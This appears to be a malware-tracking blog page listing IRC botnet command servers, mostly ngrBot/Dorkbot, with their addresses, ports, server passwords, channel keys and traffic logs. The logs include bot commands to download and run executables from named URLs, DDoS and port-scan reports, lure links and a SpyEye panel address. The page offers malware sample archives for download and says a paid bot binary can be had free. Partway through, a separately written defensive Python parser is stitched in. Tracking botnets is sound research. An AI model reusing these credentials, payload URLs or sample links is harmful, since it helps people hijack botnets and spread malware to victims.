Remote Host Port Number
88.86.113.239 31092
NICK US|computername
USER siruyuse UNIX UNIX :username
JOIN #global#
JOIN #US
Now talking in #global#
Topic On: [ #global# ] [ omtECZWQgee3/7w9aGStOwmHmYQVTJXFx68dXRhkVWUhNomgeVieycdUnnRaoait ]
Modes On: [ #global# ] [ +smntMu ]
hosting infos:
http://whois.domaintools.com/88.86.113.239
Owned Security
IT security team - researching unknown types of malware spreading.
Hackforums.net Investigation
We are working to get Hackforums.net shut down. We feel strongly that it is a website which has an undue influence on young people as well as promoting illegal computer activities such as hacking, virus spreading, manipulation of online financial services etc.
I'm not certain of what your criteria is for judging a site to be 'positive for malware'. I know that is not an easy threat to withstand and I don't blame this site for exercising caution and withdrawing the 'positive' for malware decision.
Hackforums.net - "Infecting one another with malware."
We are reporting this site for illegal activities and it should be closed as soon as possible!
Legal internet law will clean all illegal activities and we will help realise it!
[IT Security Team]
117.211.84.155(irc botnet hosted in India Bangalore O/o Dgm Bb Noc Bsnl Bangalore)
Remote Host Port Number
117.211.84.155 25343 PASS scary
NICK [USA|XP|XmWCMYN5]
USER 9583 "" "lol" :9583
NICK [USA|XP|UFdwiY47]
USER 4508 "" "lol" :4508
NICK [USA|XP|YZw7cS8u]
USER 2152 "" "lol" :2152
NICK [USA|XP|X2XUcWQU]
NICK [USA|XP|cuCVirAD]
USER 6242 "" "lol" :6242
NICK [USA|XP|bx3Iivi3]
USER 8840 "" "lol" :8840
NICK [USA|XP|fRQNcpmq]
USER 6294 "" "lol" :6294
hosting infos
http://whois.domaintools.com/117.211.84.155
204.15.252.199(irc botnet hosted in United States Henderson Trashy Media)
UPDATE:
204.15.252.199:4042
IRC traffic:
NICK new[BEL|XP|Pig-D17A7D27]dvxotgy
USER hh "" "lol" :hh
Now talking in #newbiz#
Topic On: [ #newbiz# ] [ .down /99/106/112/81/55/59/40/125/111/122/35/108/114/121/114/116/115/106/104/122/126/121/37/69/76/117/48/113/107/125/118/126/47/108/116/84/47/102/113/71/ ]
Topic By: [ b ]
Topic: b sets topic []
hosting infos:
http://whois.domaintools.com/204.15.252.199
89.238.176.123(irc botnet hosted in United Kingdom M247 Ltd)
Remote Host Port Number
195.122.131.11 80
213.251.170.52 80
64.62.243.91 80
89.238.176.123 4042 IRCD here
Now talking in #newbiz#
Topic On: [ #newbiz# ] [ ]
Topic By: [ b ]
hosting infos:
http://whois.domaintools.com/89.238.176.123
gusan0.sin-ip.es(irc botnet hosted in United States Chicago Fdcservers.net)
Remote Host Port Number
50.7.247.10 6667
NICK NEW[XX][XP]8744609838
USER 8744 "" "TsGh" :8744
MODE NEW[XX][XP]8744609838 -d
JOIN ##spam##
PONG :irc.priv8net.com
NICK {XP\USA\698507}
USER COMPUTERNAME * 0 :COMPUTERNAME
MODE {XP\USA\698507} -ix
JOIN ##v5##
MODE ##v5## -ix
PRIVMSG ##v5## :.::[DDoS]::. Flooding 127.0.0.2:1234 with ddos.syn for 50 seconds
PRIVMSG ##v5## :.::[DDoS]::. Done with flood (0KB/sec).
NICK {XP\USA\965601}
MODE {XP\USA\965601} -ix
hosting infos:
http://whois.domaintools.com/50.7.247.10
46.17.100.229(irc botnet hosted in Russian Federation Mir Telematiki Ltd)
Remote Host Port Number
46.17.100.229 4443 ircd here
46.28.64.99 444
46.28.64.99 80
79.142.67.113 80
NICK N[USA|XP][vsdyciq]
USER vsdy "" "lol" :vsdy
JOIN #b0ts
PONG 422
PRIVMSG #b0ts :[Download]: Succeeded using primary method [WinInet: 279 KB]
executables:
# http://c0re.us/test.exe
# http://waterforpeople.co.cc/crypted.exe
Spyeye panel:
http://quantummechanic.cc/controlpanel/
Spyeye executable:
http://waterforpeople.co.cc/spyfud.exe.exe
hosting info:
http://whois.domaintools.com/46.17.100.229
213.229.107.27(irc botnet hosted in United Kingdom Canonical Range For Bs2-hp1-le)
Remote Host Port Number
204.0.5.41 80
63.135.80.224 80
63.135.80.46 80
85.118.137.12 80
213.229.107.27 1234 PASS xxx
NICK NEW-[USA|00|P|07451]
USER XP-1167 * 0 :COMPUTERNAME
MODE NEW-[USA|00|P|07451] -ix
JOIN #!nn! test
PONG 22 MOTD
hosting infos:
http://whois.domaintools.com/213.229.107.27
67.210.170.142(irc botnet hosted in Canada Ottawa Network Defence Intelligence Inc)
Remote Host Port Number
67.210.170.142 20000 PASS ohai
NICK cqexck
USER nnlucf "" "ftr" :nnlucf
hosting infos:
http://whois.domaintools.com/67.210.170.142
75.102.22.20(irc botnet hosted in United States Chicago Hostforweb Inc)
Remote Host Port Number
75.102.22.20 2345
NICK New[USA|00|P|90973]
USER XP-0539 * 0 :COMPUTERNAME
MODE New[USA|00|P|90973] -ix
JOIN #!loco!
PONG 22 MOTD
hosting infos:
http://whois.domaintools.com/75.102.22.20
64.202.107.28(irc botnet hosted in United States Chicago Hostforweb Inc)
Remote Host Port Number
64.202.107.28 2345
NICK New[USA|00|P|90973]
USER XP-0539 * 0 :COMPUTERNAME
MODE New[USA|00|P|90973] -ix
JOIN #!loco!
PONG 22 MOTD
hosting infos:
http://whois.domaintools.com/64.202.107.28
72.20.14.87(irc botnet hosted in United States Staminus Communications)
Remote Host Port Number
72.20.14.87 38
JOIN #Internet#
hosting infos:
http://whois.domaintools.com/72.20.14.87
70.107.249.167(irc botnet hosted in United States New York Verizon Online Llc)
70.107.249.167:3921
Nick: A4-647337362958
Username: fpairedpyoqaak
Joined Channel: #mss2 with Password mss2pass
Channel Topic for Channel #mss2: "xvvv mssql 100 0 0 -a -r -s"
I got this info from Seb, another botnet lover, lol
hosting infos:
http://whois.domaintools.com/70.107.249.167
smellypussy.info(ngrBot very large irc botnet hosted in United States Henderson Trashy Media)
This botnet is a very big one, and the bot used for spreading is also special:
a lot of features inside, like injection into multiple system processes, Ruskill for killing processes, blocking AV updates and Windows security updates, MSN spread, FTP infection, etc.
The sample was captured by Xylitol, and then I helped find more IPs and different samples from the same botnet.
The bot is detected as Dorkbot
Here we go
Analysis from sample:
PASS %s
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
USER %s 0 0 :%s
NICK %s
JOIN %s %s
PART %s
PRIVMSG %s :%s
QUIT :%s
PONG %s
PING
PRIVMSG
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[RSOCK4]: Stopped rsock4
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[FTP Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef+]: %s
[DNS]: Blocked DNS "%s"
[MSN]: %s
[HTTP]: %s
ftplog
poplog
ftpinfect
httplogin
httptraff
ruskill
rdns
rreg
dns
msn
httpspread
blk
http://api.wipmania.com/
\\.\pipe\%08x_ipc
heytherebitch.com
ngrBot
keshmoney.biz
ngrBot
smellypussy.info
ngrBot
#boss
ngrBot
bossman
Vmv
30e41aa1
FvLQ49IlzIyLjj6m
die
msn.set
msn.int
http.set
http.int
http.inj
DNS names used by the botnet:
Resolved : [keshmoney.biz] To [204.15.252.199]
Resolved : [keshmoney.biz] To [115.146.19.158]
Resolved : [keshmoney.biz] To [61.31.99.67]
Resolved : [keshmoney.biz] To [89.238.176.123]
Resolved : [heytherebitch.com] To [115.146.19.158]
Resolved : [heytherebitch.com] To [204.15.252.199]
Resolved : [heytherebitch.com] To [89.238.176.123]
Resolved : [smellypussy.info] To [204.15.252.199]
Resolved : [smellypussy.info] To [89.238.176.123]
Resolved : [smellypussy.info] To [115.146.19.158]
Resolved : [smellypussy.info] To [61.31.99.67]
How to connect to this server:
smellypussy.info:81
heytherebitch.com:81
keshmoney.biz:81
UPDATE:
Remote Host Port Number
204.15.252.199 49287 ircd here
208.75.230.43 80
213.251.170.52 80
61.31.99.67 4042 ircd here
Channel:
Now talking in #boss
Topic On: [ #boss ] [ !http.int 6 !http.set wowww!! hahahaha http://smurl.name/3bh6?=facebook_photos_31_05_2011_jpg !msn.int 6 !msn.set wowww!! hahahaha http://x.vu/fbimages1?=facebook_photos_31_05_2011_jpg !mdns http://www.freewebtown.com/usermx/av.txt !dl http://www.freewebtown.com/usermx/nbiz.exe -n !s ]
Topic By: [ b ] b for bullshit lol
NICK new[USA|XP|COMPUTERNAME]zvbnyex
USER hh "" "lol" :hh
JOIN #newbiz#
PONG 422
Channel pass: ngrBot
The bin is for sale in underground forums for 400$, but you can have it for free now.
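The strings above give the bot's whole wire format: the IRC handshake, the templated nick, the channel join with a key, and the status reports it posts back (the [d="<url>" s="<n> bytes"] download template, the MSN/HTTP spread updates). A defender looking at captures like the ones on this page wants those pulled out as indicators rather than read by eye. The following Python script is an added example, not code from the original post or from the bot: it walks a capture line by line, names the C&C endpoint, the server PASS, the channel and its key, any templated nick, and the download and spread URLs reported through the templates listed above. The templated-nick regex is a heuristic assumed from the nick formats captured on this page, and SAMPLE_CAPTURE is a constructed input assembled from the 193.107.16.111 capture further down, with the spread URL replaced by a placeholder.

```python
import re
from dataclasses import dataclass, field

# Heuristic (assumption): nicks built from a bracketed/braced template carrying
# OS/country tags, e.g. [USA|XP|XmWCMYN5], n{US|XPa}cucqohu, NEW-[USA|00|P|07451].
TEMPLATED_NICK_RE = re.compile(r"[\[{][^\]}]*(?:XP|\|)[^\]}]*[\]}]")
# "host port [PASS x] [ircd here]" lines from the sandbox connection list.
ENDPOINT_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3}|[\w-]+(?:\.[\w-]+)+)\s+(\d{1,5})\b(.*)$")
PRIVMSG_RE = re.compile(r"^PRIVMSG\s+(\S+)\s+:(.*)$")
# ngrBot report templates from the strings above: [d="<url>" s="<n> bytes"] ...
DOWNLOAD_RE = re.compile(r"""\[d=["']([^"]+)"(?:\s+s="(\d+) bytes")?\]\s*(.*)$""")
DROPPED_FILE_RE = re.compile(r'"([A-Za-z]:\\[^"]+)"')
SPREAD_RE = re.compile(r'\[(MSN|HTTP)\]: Updated \1 spread message to "([^"]*)"')
URL_RE = re.compile(r"https?://\S+")


@dataclass
class BotSession:
    c2: str = ""                    # IRC C&C as "host:port"
    password: str = ""              # server PASS
    endpoints: list = field(default_factory=list)
    nicks: list = field(default_factory=list)
    templated_nicks: list = field(default_factory=list)
    channels: dict = field(default_factory=dict)    # channel -> join key
    downloads: list = field(default_factory=list)   # (url, size, dropped path)
    spread_urls: list = field(default_factory=list)

    def is_bot_like(self):
        """Templated nick or a parsed bot status report: not a human IRC client."""
        return bool(self.templated_nicks or self.downloads or self.spread_urls)


def parse_report(session, text):
    """Match one PRIVMSG body against the download and spread report templates."""
    m = DOWNLOAD_RE.search(text)
    if m:
        url, size, rest = m.groups()
        path = DROPPED_FILE_RE.search(rest)
        session.downloads.append((url, int(size) if size else None, path.group(1) if path else None))
        return
    m = SPREAD_RE.search(text)
    if m:
        session.spread_urls.extend(URL_RE.findall(m.group(2)))


def parse_capture(capture):
    """Walk a capture line by line and collect the indicators it exposes."""
    s = BotSession()
    for raw in capture.splitlines():
        line = raw.strip()
        if not line:
            continue
        cmd, _, rest = line.partition(" ")
        if cmd == "PASS":
            s.password = rest.strip()
        elif cmd == "NICK":
            nick = rest.strip()
            s.nicks.append(nick)
            if TEMPLATED_NICK_RE.search(nick):
                s.templated_nicks.append(nick)
        elif cmd == "JOIN":
            parts = rest.split()
            if parts:
                s.channels[parts[0]] = parts[1] if len(parts) > 1 else ""
        elif cmd == "PRIVMSG":
            m = PRIVMSG_RE.match(line)
            if m:
                parse_report(s, m.group(2))
        else:
            m = ENDPOINT_RE.match(line)
            if m:
                host, port, extra = m.groups()
                s.endpoints.append((host, int(port)))
                pm = re.search(r"\bPASS\s+(\S+)", extra)
                if pm:
                    s.password = pm.group(1)
                # A PASS or "ircd here" marker names the C&C; else the first non-HTTP port.
                if pm or "ircd" in extra.lower() or (not s.c2 and port != "80"):
                    s.c2 = f"{host}:{port}"
    return s


# Constructed sample: the 193.107.16.111 capture from this page plus one spread
# report whose URL is replaced by a placeholder.
SAMPLE_CAPTURE = r"""
Remote Host Port Number
193.107.16.111 7654 PASS ngrBot
213.251.170.52 80
66.45.255.234 80
NICK n{US|XPa}cucqohu
USER cucqohu 0 0 :cucqohu
JOIN #oldgold noKIDs
PRIVMSG #oldgold :[d="http://gloimpsa.com/js/expressInstall.swf.exe" s="167936 bytes"] Updated bot file "C:\Documents and Settings\UserName\Application Data\Fdxaxf.exe" - Download retries: 0
PRIVMSG #oldgold :[HTTP]: Updated HTTP spread message to "LOL http://spread.example.invalid/facebook-profile-pic_JPG"
"""

if __name__ == "__main__":
    print(parse_capture(SAMPLE_CAPTURE))
```

The port-80 endpoints in these captures are mostly sandbox noise (the geolocation lookup at api.wipmania.com, the payload download host), which is why the C&C is taken from the PASS or "ircd here" line first and only falls back to the first non-80 port. The dropped file path and download URL are the two values worth feeding into host and proxy blocklists; the spread URLs are what the bot pushes to victims' contacts and belong on the same list.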
brainbox.dyndns.org(irc botnet hosted in United States Sparta Ispsystem At Nac)
Remote Host Port Number
213.186.33.87 80
82.146.51.173 4598
NICK n[XP-USA]855437
PONG 422
PRIVMSG ##Channel## :
09Executed Process Successfully.
USER 8554 "" "TsGh" :8554
JOIN ##Channel3##
PRIVMSG ##Channel3## :
NICK [XP-USA]561757
USER 5617 "" "TsGh" :5617
JOIN ##Channel##
hosting infos:
http://whois.domaintools.com/82.146.51.173
72.55.132.187(irc botnet hosted in Canada Zenkis.ca)
Remote Host Port Number
213.251.170.52 80
72.55.132.187 2603 PASS ngrBot
78.47.10.199 21
NICK n{US|XPa}hjcbvjl
USER hjcbvjl 0 0 :hjcbvjl
JOIN #phcrulez ngrBot
USER adi
hosting infos:
http://whois.domaintools.com/72.55.132.187
infected34.co.cc(irc botnet hosted in Germany Berlin Fast It Colocation)
ircd :infected34.co.cc:6667 PASS timu or PASS aliss
NICK [00|USA|989169]
USER XP-6593 * 0 :COMPUTERNAME
MODE [00|USA|989169] -ix
JOIN #N timu
MODE [SI|USA|00|P|79102] -ix
JOIN #test# aliss
PONG 217.79.190.39
NICK [SI|USA|00|P|79102]
USER XP-4584 * 0 :COMPUTERNAME
hosting infos:
http://whois.domaintools.com/217.79.190.39
75.102.22.40(irc botnet hosted in United States Chicago Hostforweb Inc)
Remote Host Port Number
195.122.131.8 80
204.0.5.41 80
63.135.80.224 80
63.135.80.46 80
66.220.158.11 80
75.102.22.40 2866 PASS xxx
NICK NEW-[USA|00|P|20798]
USER XP-0727 * 0 :COMPUTERNAME
MODE NEW-[USA|00|P|20798] -ix
JOIN #!nine! test
PONG 22 MOTD
hosting infos:
http://whois.domaintools.com/75.102.22.40
50mb malware samples
This is another package with different malware samples.
have fun
size=50mb
Download:
http://c65cdb0b.tubeviral.com
toxfeenyxx.sdeirc.net(phoenix bot hosted in Cyprus C & C Advanced Online Services Ltd)
Remote Host Port Number
toxfeenyxx.sdeirc.net 3674
NICK N[USA|XP][tjxcvay]
USER tjxc "" "lol" :tjxc
JOIN #phoenix selling9309239
NICK N[USA|XP][baersyl]
USER baer "" "lol" :baer
hosting infos:
http://whois.domaintools.com/46.243.8.142
homelessman.weedns.com(Mouse's botnet hosted in the whole world lol)
This is probably one of the biggest botnets still alive, for years now.
dns:homelessman.weedns.com
port:3305
Resolved : [homelessman.weedns.com] To [80.247.72.130]
Resolved : [homelessman.weedns.com] To 13[92.62.231.115]
Resolved : [homelessman.weedns.com] To [202.117.53.21]
Resolved : [homelessman.weedns.com] To [156.26.121.177]
DNS List:
ns.yumetairiku.co.jp:3305
virtual-mgsf.nebula.fi:3305
dell.aurius.sk:3305
cx10man.weedns.com:3305
fx010413.whyI.org:3305
gynoman.weedns.com:3305
c010x1.co.cc:3305
commgr.co.cc:3305
g.0x20.biz:3305
telephone.dd.blueline.be:3305
cx10man.weedns.com:3305
gynoman.weedns.com:3305
www.carpet-backing.com
www.comofil.it
www.iris-spa.it
www.osteriadeltorchio.it
ballslessman.weedns.com:3305
fx010413.whyi.org:3305
hr.whyi.org:3305
hikemanplace.weedns.com:3305
opmanplace.weedns.com:3305
www.usderviese.it
NICK P|hy4m13g8c
USER kv7ucu7y9 * 0 :USA|XP|601
USERHOST P|hy4m13g8c
MODE P|hy4m13g8c
JOIN #mm RSA
PRIVMSG #mm :+Cpiwe/Bec9E07RQ/c0vtb4S//EdYX/xXUDj093Z0X0JV7.c0puSW4.pimDm1LRefR1ZyBMf0vZEvo.KMXSW1c0M3m/Fwv310uA.y6/SUz0u/OGWL5.gwJqI.6pkc9.kty0t0KWEjq.nHZN20/qQ08.asyjW/qqA8J1QcT5G1
ashland.aboutkiddies.com(irc botnet hosted in United States New York Webair Internet Development Company Inc)
Remote Host Port Number
209.200.50.75 3800 PASS hax0r
213.251.170.52 80
91.200.241.40 80
* The data identified by the following URLs was then requested from the remote web server:
o http://api.wipmania.com/
o http://91.200.241.40/dq.exe
PRIVMSG #dpi :[d="http://91.200.241.40/dq.exe" s="23552 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\1.tmp" - Download retries: 0
PASS hax0r..KCIK
00000010 | 206E 7B55 537C 5850 617D 6D69 696D 6567 | n{US|XPa}miimeg
00000020 | 740D 0A52 5353 5220 6D69 696D 6567 7420 | t..RSSR miimegt
00000030 | 3020 3020 3A6D 6969 6D65 6774 0D0A 5345 | 0 0 :miimegt..SE
00000040 | 4E44 2023 6E67 206E 6730 300D 0A | ND #ng ng00..
hosting infos:
http://whois.domaintools.com/209.200.50.75
46.243.8.119(irc botnet hosted in Cyprus C & C Advanced Online Services Ltd)
Remote Host Port Number
ircserver.taylor412gang.com 3941
NICK N[USA|XP][qhfpagj]
USER qhfp "" "lol" :qhfp
JOIN #apple apple57
hosting infos:
http://whois.domaintools.com/46.243.8.119
01.cybernix.info(irc botnet hosted in United States Willowbrook Psinet Inc)
Remote Host Port Number
01.cybernix.info 1750 PASS gsaxx00
NICK \00\USA\9j6m6dbn0n
USER XP-SP2 x x :COMPUTERNAME
JOIN ##pool P00L
NICK \00\USA\iky784di69
hosting infos:
http://whois.domaintools.com/154.35.64.32
95.173.179.231(irc botnet hosted in Turkey Netinternet Bilgisayar Ve Telekomunikasyon San. Ve Tic. Ltd. Sti)
Remote Host Port Number
95.173.179.231 6667 PASS codr00t
MODE [USA|XP|094124] -ix
JOIN #k codr00t
PRIVMSG #k :[p2p]: Spreading to p2p folders.
PONG HTTP1.4
NICK [USA|XP|094124]
USER xfgbxix * 0 :COMPUTERNAME
hosting infos:
http://whois.domaintools.com/95.173.179.231
main.xxxxxiseviumixxxxx.info(irc botnet hosted in Germany Berlin Active Media)
Remote Host Port Number
jky.no-ip.info 3177 RAT here
main.xxxxxiseviumixxxxx.info 3211 IRCD here
NICK Sapphire{USA|XP-SP2}0300311
USER 03003114 "" "03003114" :03003114
MODE Sapphire{USA|XP-SP2}0300311
JOIN #Sapphire_2#
NICK New{USA|XP-SP2}1046453
USER 10464537 "" "10464537" :10464537
MODE New{USA|XP-SP2}1046453
hosting infos:
http://whois.domaintools.com/88.198.219.113
yesim.hoodrich.ru(irc botnet hosted in United States South Lake Tahoe Reliablehosting.com - Network Services)
Remote Host Port Number
yesim.hoodrich.ru:4042
Resolved : [yesim.hoodrich.ru] To [216.131.127.13]
216.131.127.13 4042
89.201.164.126 80
NICK new[USA|XP|COMPUTERNAME]pethrmn
USER xD "" "lol" :xD
JOIN #biznew#
PONG 422
PONG :irc.priv8net4.com
* The data identified by the following URL was then requested from the remote web server:
o http://epicbookings.com/images/jun16.exe
hosting infos:
http://whois.domaintools.com/216.131.127.13
kayits.byinter.net(irc botnet hosted in Turkey Netinternet Bilgisayar Ve Telekomunikasyon San. Ve Tic. Ltd. Sti)
found by tr0j3n
Remote Host Port Number
kayits.byinter.net 7107
NICK new[iRooT-XP-USA]667657
USER 3221 "" "TsGh" :3221
JOIN #!MSN! Coded
NICK [iRooT-XP-USA]008675
USER 0086 "" "TsGh" :0086
NICK [iRooT-XP-USA]049882
USER 0498 "" "TsGh" :0498
hosting infos:
http://whois.domaintools.com/94.102.1.163
qeshmjaa.zapto.org(desperate albanian hecker hosting botnet in Ireland Dublin Digiweb Ltd)
Remote Host Port Number
qeshmjaa.zapto.org 4244
NICK [iRooT-XP-USA]211081
USER 2110 "" "TsGh" :2110
JOIN #gan# sk
NICK new[iRooT-XP-USA]709534
USER 7095 "" "TsGh" :7095
NICK [iRooT-XP-USA]664288
USER 6642 "" "TsGh" :6642
hosting infos:
http://whois.domaintools.com/78.137.159.84
22mb malware samples
size 22mb
Different malware samples inside.
Have fun reversing.
Download:
http://8efc580b.tubeviral.com
tinker.weedns.com(irc botnet Mouse's net again)
Remote Host Port Number
tinker.weedns.com 3305 PASS secretpass
Resolved : [tinker.weedns.com] To [173.9.72.212]
Resolved : [tinker.weedns.com] To [222.124.178.155]
Resolved : [tinker.weedns.com] To [66.238.151.86]
Resolved : [tinker.weedns.com] To [188.165.200.48]
Resolved : [tinker.weedns.com] To [74.210.208.163]
NICK yf69xrls6
USER rb6c2qqku * 0 :USA|XP|115
JOIN #mm RSA
Topic On: [ #mm ] [ +yOfS7/ZgRdB.u97R71RybXB/ubyOC/gLWja.029Cg1ae4NB/TcaF4.m9cnf/dRE2M0IU0Az0JjgIw/Pu691.6bET91ANj0U. ]
193.107.16.111(irc botnet hosted in Seychelles Ideal Solution Ltd)
Remote Host Port Number
193.107.16.111 7654 PASS ngrBot
213.251.170.52 80
66.45.255.234 80
NICK n{US|XPa}cucqohu
USER cucqohu 0 0 :cucqohu
JOIN #oldgold noKIDs
PRIVMSG #oldgold :[d="http://gloimpsa.com/js/expressInstall.swf.exe" s="167936 bytes"] Updated bot file "C:\Documents and Settings\UserName\Application Data\Fdxaxf.exe" - Download retries: 0
hosting infos:
http://whois.domaintools.com/193.107.16.111
91.215.159.137(irc botnet hosted in Netherlands Amsterdam Infinite Technologies Internet Solutions Limited)
Remote Host Port Number
112.78.8.20 80
195.122.131.3 80
213.251.170.52 80
91.215.159.137 1866 PASS ngrBot
PRIVMSG #!hot! :[DNS]: Blocked 1259 domain(s) - Redirected 0 domain(s)
PRIVMSG #!hot! :[d="http://rapidshare.com/files/2997295683/nap.exe"] Error downloading file [e="12039"]
NICK n{US|XPa}aytockz
USER aytockz 0 0 :aytockz
JOIN #!hot! ngrBot
PRIVMSG #!hot! :[HTTP]: Updated HTTP spread interval to "5"
PRIVMSG #!hot! :[HTTP]: Updated HTTP spread message to "LOL http://jardincaracolito.edu.co/facebook-profile-pic-r9k5w9_JPG"
PRIVMSG #!hot! :[MSN]: Updated MSN spread interval to "5"
PRIVMSG #!hot! :[MSN]: Updated MSN spread message to "LOL http://jardincaracolito.edu.co/facebook-profile-pic-u9v2e9_JPG"
hosting infos:
http://whois.domaintools.com/91.215.159.137
c0re.su(irc botnet hosted in Russian Federation Mir Telematiki Ltd)
Remote Host Port Number
c0re.su 4443
NICK N[USA|XP][yiowryo]
USER yiow "" "lol" :yiow
JOIN #b0ts
NICK N[USA|XP][uuobuyk]
USER uuob "" "lol" :uuob
NICK [USA-XP][ftlizjn]
USER 2844 "" "TsGh" :2844
JOIN #botz
NICK [USA-XP][qirnfam]
USER 9143 "" "TsGh" :9143
NICK [n][USA-XP][ihcnykp]
USER 2550 "" "TsGh" :2550
hosting infos:
http://whois.domaintools.com/46.17.100.229
92.241.165.115(irc botnet hosted in Russian Federation Oao Webalta)
Remote Host Port Number
213.251.170.52 80
92.241.165.115 1863 PASS ngrBot
NICK n{US|XPa}qgaqcrq
USER qgaqcrq 0 0 :qgaqcrq
JOIN #start romeo
Now talking in #start
Topic On: [ #start ] [ *mdns http://www.abbygamerz.net/foro/index *msn.int 5 *msn.set viste las fotos nuevas de mi facebook? http://adf.ly/1gYW7 ]
Topic By: [ ecu ]
hosting infos:
http://whois.domaintools.com/92.241.164.67
115.239.230.73(irc botnet hosted in China Zhejiang Ninbo Lanzhong Network Ltd)
Remote Host Port Number
115.239.230.73 6943 PASS laorosr
213.251.170.52 80
31.184.237.43 80
98.126.35.112 80
MODE [N00_USA_XP_1295223]
@ -ix
00000000 | 5041 5353 206C 616F 726F 7372 0D0A 5052 | PASS laorosr..PR
00000010 | 5256 4D53 4720 5B4E 3030 5F55 5341 5F58 | RVMSG [N00_USA_X
00000020 | 505F 3132 3935 BCB9 4020 3A20 5261 6E64 | P_1295..@ : Rand
00000030 | 6F6D 2050 6F72 7420 5363 616E 2073 7461 | om Port Scan sta
00000040 | 7274 6564 206F 6E20 3137 342E 3133 332E | rted on 174.133.
00000050 | 782E 783A 3434 3520 7769 7468 2061 2064 | x.x:445 with a d
00000060 | 656C 6179 206F 6620 3520 7365 636F 6E64 | elay of 5 second
00000070 | 7320 666F 7220 3020 6D69 6E75 7465 7320 | s for 0 minutes
00000080 | 7573 696E 6720 3235 2074 6872 6561 6473 | using 25 threads
00000090 | 2E0D 0A50 5252 564D 5347 205B 4E30 305F | ...PRRVMSG [N00_
000000A0 | 5553 415F 5850 5F31 3239 35BC B940 203A | USA_XP_1295..@ :
000000B0 | 2053 6571 7565 6E74 6961 6C20 506F 7274 | Sequential Port
000000C0 | 2053 6361 6E20 7374 6172 7465 6420 6F6E | Scan started on
000000D0 | 2031 3932 2E31 3638 2E30 2E30 3A34 3435 | 192.168.0.0:445
000000E0 | 2077 6974 6820 6120 6465 6C61 7920 6F66 | with a delay of
000000F0 | 2035 2073 6563 6F6E 6473 2066 6F72 2030 | 5 seconds for 0
00000100 | 206D 696E 7574 6573 2075 7369 6E67 2032 | minutes using 2
00000110 | 3020 7468 7265 6164 732E 0D0A 5052 5256 | 0 threads...PRRV
00000120 | 4D53 4720 5B4E 3030 5F55 5341 5F58 505F | MSG [N00_USA_XP_
00000130 | 3132 3935 BCB9 4020 3A20 5365 7175 656E | 1295..@ : Sequen
00000140 | 7469 616C 2050 6F72 7420 5363 616E 2073 | tial Port Scan s
00000150 | 7461 7274 6564 206F 6E20 3139 322E 3136 | tarted on 192.16
00000160 | 382E 3632 2E30 3A34 3435 2077 6974 6820 | 8.62.0:445 with
00000170 | 6120 6465 6C61 7920 6F66 2035 2073 6563 | a delay of 5 sec
00000180 | 6F6E 6473 2066 6F72 2030 206D 696E 7574 | onds for 0 minut
00000190 | 6573 2075 7369 6E67 2032 3020 7468 7265 | es using 20 thre
000001A0 | 6164 732E 0D0A 5052 5256 4D53 4720 5B4E | ads...PRRVMSG [N
000001B0 | 3030 5F55 5341 5F58 505F 3132 3935 BCB9 | 00_USA_XP_1295..
000001C0 | 4020 3A20 5365 7175 656E 7469 616C 2050 | @ : Sequential P
000001D0 | 6F72 7420 5363 616E 2073 7461 7274 6564 | ort Scan started
000001E0 | 206F 6E20 3139 322E 302E 302E 303A 3434 | on 192.0.0.0:44
000001F0 | 3520 7769 7468 2061 2064 656C 6179 206F | 5 with a delay o
00000200 | 6620 3520 7365 636F 6E64 7320 666F 7220 | f 5 seconds for
00000210 | 3020 6D69 6E75 7465 7320 7573 696E 6720 | 0 minutes using
00000220 | 3130 2074 6872 6561 6473 2E0D 0A4B 4349 | 10 threads...KCI
00000230 | 4B20 5B4E 3030 5F55 5341 5F58 505F 3132 | K [N00_USA_XP_12
00000240 | 3935 3232 335D 18E7 400D 0A72 7373 7220 | 95223]..@..rssr
00000250 | 5350 322D 3238 3520 2A20 3020 3A43 4F4D | SP2-285 * 0 :COM
00000260 | 5055 5445 524E 414D 450D 0A73 656E 6420 | PUTERNAME..send
00000270 | 236A 2C23 4D61 206F 6F6F 6F0D 0A50 5252 | #j,#Ma oooo..PRR
00000280 | 564D 5347 2023 6920 3A48 5454 5020 5345 | VMSG #i :HTTP SE
00000290 | 5420 6874 7470 3A2F 2F33 312E 3138 342E | T http://31.184.
000002A0 | 3233 372E 3433 2F35 356D 732E 6578 650D | 237.43/55ms.exe.
000002B0 | 0A50 5252 564D 5347 205B 4E30 305F 5553 | .PRRVMSG [N00_US
000002C0 | 415F 5850 5F31 3239 35BC B940 203A 2052 | A_XP_1295..@ : R
000002D0 | 616E 646F 6D20 506F 7274 2053 6361 6E20 | andom Port Scan
000002E0 | 7374 6172 7465 6420 6F6E 2031 3734 2E78 | started on 174.x
000002F0 | 2E78 2E78 3A34 3435 2077 6974 6820 6120 | .x.x:445 with a
00000300 | 6465 6C61 7920 6F66 2035 2073 6563 6F6E | delay of 5 secon
00000310 | 6473 2066 6F72 2030 206D 696E 7574 6573 | ds for 0 minutes
